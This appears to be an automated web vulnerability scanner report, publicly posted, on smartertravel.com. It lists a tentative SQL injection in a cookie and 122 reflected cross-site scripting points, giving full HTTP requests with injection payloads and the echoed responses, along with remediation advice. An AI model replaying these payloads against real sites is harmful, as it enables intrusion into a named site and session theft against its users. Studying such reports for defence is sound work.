Report generated by XSS.CX at Sun Nov 14 16:16:37 CST 2010.


Cross Site Scripting Reports | Hoyt LLC Research

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler | MSRC Reference | GOOG Reference | CVE-2010-3486 | CVE-2010-3425

Loading

1. SQL injection

2. Cross-site scripting (reflected)

2.1. http://www.smartertravel.com/adventure-travel/ [REST URL parameter 1]

2.2. http://www.smartertravel.com/airfare/ [REST URL parameter 1]

2.3. http://www.smartertravel.com/airfare/Learn-taxes-fees-increase.html [REST URL parameter 1]

2.4. http://www.smartertravel.com/airfare/Learn-taxes-fees-increase.html [REST URL parameter 2]

2.5. http://www.smartertravel.com/airfare/directory/ [REST URL parameter 1]

2.6. http://www.smartertravel.com/airfare/directory/ [REST URL parameter 2]

2.7. http://www.smartertravel.com/airfare/schedules/ [REST URL parameter 1]

2.8. http://www.smartertravel.com/airfare/schedules/ [REST URL parameter 2]

2.9. http://www.smartertravel.com/airfare/search/ [REST URL parameter 1]

2.10. http://www.smartertravel.com/airfare/search/ [REST URL parameter 2]

2.11. http://www.smartertravel.com/ajax/ [REST URL parameter 1]

2.12. http://www.smartertravel.com/blogs/ [REST URL parameter 1]

2.13. http://www.smartertravel.com/car-rental/ [REST URL parameter 1]

2.14. http://www.smartertravel.com/columns/ [REST URL parameter 1]

2.15. http://www.smartertravel.com/community/ [REST URL parameter 1]

2.16. http://www.smartertravel.com/community/login.php [REST URL parameter 1]

2.17. http://www.smartertravel.com/community/login.php [REST URL parameter 2]

2.18. http://www.smartertravel.com/community/register.php [REST URL parameter 1]

2.19. http://www.smartertravel.com/community/register.php [REST URL parameter 2]

2.20. http://www.smartertravel.com/compare-prices/ [REST URL parameter 1]

2.21. http://www.smartertravel.com/compare-prices/car-rental/ [REST URL parameter 1]

2.22. http://www.smartertravel.com/compare-prices/car-rental/ [REST URL parameter 2]

2.23. http://www.smartertravel.com/compare-prices/cruise/ [REST URL parameter 1]

2.24. http://www.smartertravel.com/compare-prices/cruise/ [REST URL parameter 2]

2.25. http://www.smartertravel.com/compare-prices/flights/ [REST URL parameter 1]

2.26. http://www.smartertravel.com/compare-prices/flights/ [REST URL parameter 2]

2.27. http://www.smartertravel.com/compare-prices/hotel/ [REST URL parameter 1]

2.28. http://www.smartertravel.com/compare-prices/hotel/ [REST URL parameter 2]

2.29. http://www.smartertravel.com/compare-prices/vacation-package/ [REST URL parameter 1]

2.30. http://www.smartertravel.com/compare-prices/vacation-package/ [REST URL parameter 2]

2.31. http://www.smartertravel.com/compare-prices/vacation-rentals/ [REST URL parameter 1]

2.32. http://www.smartertravel.com/compare-prices/vacation-rentals/ [REST URL parameter 2]

2.33. http://www.smartertravel.com/cruise/ [REST URL parameter 1]

2.34. http://www.smartertravel.com/deals/ [REST URL parameter 1]

2.35. http://www.smartertravel.com/family-travel/ [REST URL parameter 1]

2.36. http://www.smartertravel.com/features/ [REST URL parameter 1]

2.37. http://www.smartertravel.com/frequent-flyer/ [REST URL parameter 1]

2.38. http://www.smartertravel.com/guides/ [REST URL parameter 1]

2.39. http://www.smartertravel.com/hotel/ [REST URL parameter 1]

2.40. http://www.smartertravel.com/last-minute/ [REST URL parameter 1]

2.41. http://www.smartertravel.com/links/ [REST URL parameter 1]

2.42. http://www.smartertravel.com/photo-galleries/ [REST URL parameter 1]

2.43. http://www.smartertravel.com/search/ [REST URL parameter 1]

2.44. http://www.smartertravel.com/senior-travel/ [REST URL parameter 1]

2.45. http://www.smartertravel.com/specialty/ [REST URL parameter 1]

2.46. http://www.smartertravel.com/student-travel/ [REST URL parameter 1]

2.47. http://www.smartertravel.com/tip-of-the-day/ [REST URL parameter 1]

2.48. http://www.smartertravel.com/tools/ [REST URL parameter 1]

2.49. http://www.smartertravel.com/travel-advice/ [REST URL parameter 1]

2.50. http://www.smartertravel.com/travel-guides/ [REST URL parameter 1]

2.51. http://www.smartertravel.com/travel-guides/amsterdam-travel-guide.html [REST URL parameter 1]

2.52. http://www.smartertravel.com/travel-guides/amsterdam-travel-guide.html [REST URL parameter 2]

2.53. http://www.smartertravel.com/travel-guides/boston-travel-guide.html [REST URL parameter 1]

2.54. http://www.smartertravel.com/travel-guides/boston-travel-guide.html [REST URL parameter 2]

2.55. http://www.smartertravel.com/travel-guides/chattanooga-travel-guide.html [REST URL parameter 1]

2.56. http://www.smartertravel.com/travel-guides/chattanooga-travel-guide.html [REST URL parameter 2]

2.57. http://www.smartertravel.com/travel-guides/chicago-travel-guide.html [REST URL parameter 1]

2.58. http://www.smartertravel.com/travel-guides/chicago-travel-guide.html [REST URL parameter 2]

2.59. http://www.smartertravel.com/travel-guides/greensboro-travel-guide.html [REST URL parameter 1]

2.60. http://www.smartertravel.com/travel-guides/greensboro-travel-guide.html [REST URL parameter 2]

2.61. http://www.smartertravel.com/travel-guides/kansas-city-travel-guide.html [REST URL parameter 1]

2.62. http://www.smartertravel.com/travel-guides/kansas-city-travel-guide.html [REST URL parameter 2]

2.63. http://www.smartertravel.com/travel-guides/kissimmee-travel-guide.html [REST URL parameter 1]

2.64. http://www.smartertravel.com/travel-guides/kissimmee-travel-guide.html [REST URL parameter 2]

2.65. http://www.smartertravel.com/travel-guides/las-vegas-travel-guide.html [REST URL parameter 1]

2.66. http://www.smartertravel.com/travel-guides/las-vegas-travel-guide.html [REST URL parameter 2]

2.67. http://www.smartertravel.com/travel-guides/lexington-travel-guide.html [REST URL parameter 1]

2.68. http://www.smartertravel.com/travel-guides/lexington-travel-guide.html [REST URL parameter 2]

2.69. http://www.smartertravel.com/travel-guides/london-travel-guide.html [REST URL parameter 1]

2.70. http://www.smartertravel.com/travel-guides/london-travel-guide.html [REST URL parameter 2]

2.71. http://www.smartertravel.com/travel-guides/louisville-travel-guide.html [REST URL parameter 1]

2.72. http://www.smartertravel.com/travel-guides/louisville-travel-guide.html [REST URL parameter 2]

2.73. http://www.smartertravel.com/travel-guides/miami-travel-guide.html [REST URL parameter 1]

2.74. http://www.smartertravel.com/travel-guides/miami-travel-guide.html [REST URL parameter 2]

2.75. http://www.smartertravel.com/travel-guides/orlando-travel-guide.html [REST URL parameter 1]

2.76. http://www.smartertravel.com/travel-guides/orlando-travel-guide.html [REST URL parameter 2]

2.77. http://www.smartertravel.com/travel-guides/paris-travel-guide.html [REST URL parameter 1]

2.78. http://www.smartertravel.com/travel-guides/paris-travel-guide.html [REST URL parameter 2]

2.79. http://www.smartertravel.com/travel-guides/richmond-travel-guide.html [REST URL parameter 1]

2.80. http://www.smartertravel.com/travel-guides/richmond-travel-guide.html [REST URL parameter 2]

2.81. http://www.smartertravel.com/travel-guides/tokyo-travel-guide.html [REST URL parameter 1]

2.82. http://www.smartertravel.com/travel-guides/tokyo-travel-guide.html [REST URL parameter 2]

2.83. http://www.smartertravel.com/travel-guides/tulsa-travel-guide.html [REST URL parameter 1]

2.84. http://www.smartertravel.com/travel-guides/tulsa-travel-guide.html [REST URL parameter 2]

2.85. http://www.smartertravel.com/travel-guides/williamsburg-travel-guide.html [REST URL parameter 1]

2.86. http://www.smartertravel.com/travel-guides/williamsburg-travel-guide.html [REST URL parameter 2]

2.87. http://www.smartertravel.com/us/sitemap.php [REST URL parameter 1]

2.88. http://www.smartertravel.com/us/sitemap.php [REST URL parameter 2]

2.89. http://www.smartertravel.com/us/sitemap.php [name of an arbitrarily supplied request parameter]

2.90. http://www.smartertravel.com/us/travel-discount-center.php [REST URL parameter 1]

2.91. http://www.smartertravel.com/us/travel-discount-center.php [REST URL parameter 2]

2.92. http://www.smartertravel.com/us/travel-discount-center.php [name of an arbitrarily supplied request parameter]

2.93. http://www.smartertravel.com/vacation-package/ [REST URL parameter 1]

2.94. http://www.smartertravel.com/weekend-getaways/ [REST URL parameter 1]

2.95. http://www.smartertravel.com/xd_receiver.htm [REST URL parameter 1]

2.96. http://www.smartertravel.com/xml/rss/deals.php [REST URL parameter 1]

2.97. http://www.smartertravel.com/xml/rss/deals.php [REST URL parameter 2]

2.98. http://www.smartertravel.com/xml/rss/deals.php [REST URL parameter 3]

2.99. http://www.smartertravel.com/airfare/Learn-taxes-fees-increase.html [Referer HTTP header]

2.100. http://www.smartertravel.com/travel-guides/amsterdam-travel-guide.html [Referer HTTP header]

2.101. http://www.smartertravel.com/travel-guides/boston-travel-guide.html [Referer HTTP header]

2.102. http://www.smartertravel.com/travel-guides/chattanooga-travel-guide.html [Referer HTTP header]

2.103. http://www.smartertravel.com/travel-guides/chicago-travel-guide.html [Referer HTTP header]

2.104. http://www.smartertravel.com/travel-guides/greensboro-travel-guide.html [Referer HTTP header]

2.105. http://www.smartertravel.com/travel-guides/kansas-city-travel-guide.html [Referer HTTP header]

2.106. http://www.smartertravel.com/travel-guides/kissimmee-travel-guide.html [Referer HTTP header]

2.107. http://www.smartertravel.com/travel-guides/las-vegas-travel-guide.html [Referer HTTP header]

2.108. http://www.smartertravel.com/travel-guides/lexington-travel-guide.html [Referer HTTP header]

2.109. http://www.smartertravel.com/travel-guides/london-travel-guide.html [Referer HTTP header]

2.110. http://www.smartertravel.com/travel-guides/louisville-travel-guide.html [Referer HTTP header]

2.111. http://www.smartertravel.com/travel-guides/miami-travel-guide.html [Referer HTTP header]

2.112. http://www.smartertravel.com/travel-guides/orlando-travel-guide.html [Referer HTTP header]

2.113. http://www.smartertravel.com/travel-guides/richmond-travel-guide.html [Referer HTTP header]

2.114. http://www.smartertravel.com/travel-guides/tokyo-travel-guide.html [Referer HTTP header]

2.115. http://www.smartertravel.com/travel-guides/tulsa-travel-guide.html [Referer HTTP header]

2.116. http://www.smartertravel.com/compare-prices/ [o_prvchan cookie]

2.117. http://www.smartertravel.com/compare-prices/car-rental/ [o_prvchan cookie]

2.118. http://www.smartertravel.com/compare-prices/cruise/ [o_prvchan cookie]

2.119. http://www.smartertravel.com/compare-prices/flights/ [o_prvchan cookie]

2.120. http://www.smartertravel.com/compare-prices/hotel/ [o_prvchan cookie]

2.121. http://www.smartertravel.com/compare-prices/vacation-package/ [o_prvchan cookie]

2.122. http://www.smartertravel.com/compare-prices/vacation-rentals/ [o_prvchan cookie]



1. SQL injection  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.smartertravel.com
Path:   /us/sitemap.php

Issue detail

The entry_time cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the entry_time cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

Request 1

GET /us/sitemap.php HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time'%20and%201%3d1--%20; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response 1

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 02:22:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 02:22:29 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 02:22:29 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Sat, 14-Nov-2009 02:22:29 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=Miscellaneous; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 42177

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head><
...[SNIP]...
<img src="http://stats.smartertravel.com/b/ss/sltravelcom/1/H.10--NS/804477130?g=http%3A%2F%2Fwww.smartertravel.com%2Fdisplay_chunk.php&amp;r=&amp;s.pageName=Site+Map&amp;s.eVar25=Site+Map&amp;s.eVar37=1%7CI5&amp;s.channel=Miscellaneous&amp;s.eVar24=Miscellaneous&amp;s.server=app1&amp;s.prop10=kayak_Air_Smarter_Travel_All_Vacation_Ad_2&amp;s.events=event11%2Cevent12%2Cevent15" height="1" width="1" border="0" alt="" /></a></noscript><!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: H.10. -->
</div>
       <div class="page_margins">
           <div class="page">
               <div id="header">
                   <div id="header_content">
                       <div id="smartertravel_logo"><a href="/" target="_top"><img src="http://i.slimg.com/st/header/2.0/header-bg-left.gif" alt="SmarterTravel Logo" /></a></div>
                       <div id="search_toolbar"><form method="get" action="/search/" target="_top">
   <input class="st_search_field" type="text" name="q" value="" />
   <input class="st_search_button" type="image" src="http://i.slimg.com/st/buttons/pluck/1.2/search.png" alt="Search Button"/>
</form>
</div>
                       <div id="membership_toolbar"><div id="MySmarterTravel">
   <div class="st_profile_image">
       <div class="st_profile_shadow"><img src="http://i.slimg.com/st/avatar-shadow.png" alt="shadow" /></div>
       <div class="st_profile_actual_image"><a href="http://www.smartertravel.com/community/"><img src="http://sitelife.smartertravel.com/ver1.0/Content/images/no-user-image.gif" alt="User's Avatar" /></a></div>
   </div>
   <div class="st_header">My SmarterTravel</div>
   <div class="st_links">
       <a href="/community/login.php" id="login_layer">Log In</a> |
       <a href="/community/register.php" id="signup_layer">Join Now</a>    </div>
</div>
</div>
                   </div>
               </div>

               <div id="nav" class="hmenu"><ul class="nav_level_1"><li><a href="/" target="_top" rel="nofollow"><span>home</span></a></li><li><a href="/deals/" target="_top" ><span>travel deals</span></a><ul class="nav_level_2"><li><a href="/airfare/" target="_top" ><span>Airfare</span></a></li><li><a href="/vacation-package/" target="_top"
...[SNIP]...

Request 2

GET /us/sitemap.php HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time'%20and%201%3d2--%20; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response 2

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 02:22:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 02:22:30 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 02:22:30 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Sat, 14-Nov-2009 02:22:30 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=Miscellaneous; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 42190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head><
...[SNIP]...
<img src="http://stats.smartertravel.com/b/ss/sltravelcom/1/H.10--NS/1561277427?g=http%3A%2F%2Fwww.smartertravel.com%2Fdisplay_chunk.php&amp;r=&amp;s.pageName=Site+Map&amp;s.eVar25=Site+Map&amp;s.eVar37=1%7CI5&amp;s.channel=Miscellaneous&amp;s.eVar24=Miscellaneous&amp;s.server=app2&amp;s.prop10=kayak_Air_Smarter_Travel_All_Vacation_Ad_2&amp;s.events=event11%2Cevent12%2Cevent15" height="1" width="1" border="0" alt="" /></a></noscript><!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: H.10. -->
</div>
       <div class="page_margins">
           <div class="page">
               <div id="header">
                   <div id="header_content">
                       <div id="smartertravel_logo"><a href="/" target="_top"><img src="http://i.slimg.com/st/header/2.0/header-bg-left.gif" alt="SmarterTravel Logo" /></a></div>
                       <div id="search_toolbar"><form method="get" action="/search/" target="_top">
   <input class="st_search_field" type="text" name="q" value="" />
   <input class="st_search_button" type="image" src="http://i.slimg.com/st/buttons/pluck/1.2/search.png" alt="Search Button"/>
</form>
</div>
                       <div id="membership_toolbar"><div id="MySmarterTravel">
   <div class="st_profile_image">
       <div class="st_profile_shadow"><img src="http://i.slimg.com/st/avatar-shadow.png" alt="shadow" /></div>
       <div class="st_profile_actual_image"><a href="http://www.smartertravel.com/community/"><img src="http://sitelife.smartertravel.com/ver1.0/Content/images/no-user-image.gif" alt="User's Avatar" /></a></div>
   </div>
   <div class="st_header">My SmarterTravel</div>
   <div class="st_links">
       <a href="/community/login.php" id="login_layer">Log In</a> |
       <a href="/community/register.php" id="signup_layer">Join Now</a>    </div>
</div>
</div>
                   </div>
               </div>

               <div id="nav" class="hmenu"><ul class="nav_level_1"><li><a href="/" target="_top" rel="nofollow"><span>home</span></a></li><li><a href="/deals/" target="_top" ><span>travel deals</span></a><ul class="nav_level_2"><li><a href="/airfare/" target="_top" ><span>Airfare</span></a></li><li><a href="/vacation-package/" target="_top
...[SNIP]...

2. Cross-site scripting (reflected)  previous
There are 122 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://www.smartertravel.com/adventure-travel/ [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /adventure-travel/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cb0cf<script>alert(1)</script>4f259914765 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adventure-travelcb0cf<script>alert(1)</script>4f259914765/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 02:07:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 02:07:28 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 02:07:28 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Sat, 14-Nov-2009 02:07:28 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27588

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/adventure-travelcb0cf<script>alert(1)</script>4f259914765/</p>
...[SNIP]...

2.2. http://www.smartertravel.com/airfare/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /airfare/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c9c27<script>alert(1)</script>b9557cb0a72 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /airfarec9c27<script>alert(1)</script>b9557cb0a72/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 23:41:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 23:42:09 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 23:42:09 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 23:42:09 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27604

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/airfarec9c27<script>alert(1)</script>b9557cb0a72/</p>
...[SNIP]...

2.3. http://www.smartertravel.com/airfare/Learn-taxes-fees-increase.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /airfare/Learn-taxes-fees-increase.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6e8d9<script>alert(1)</script>b586d97e9f6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /airfare6e8d9<script>alert(1)</script>b586d97e9f6/Learn-taxes-fees-increase.html HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
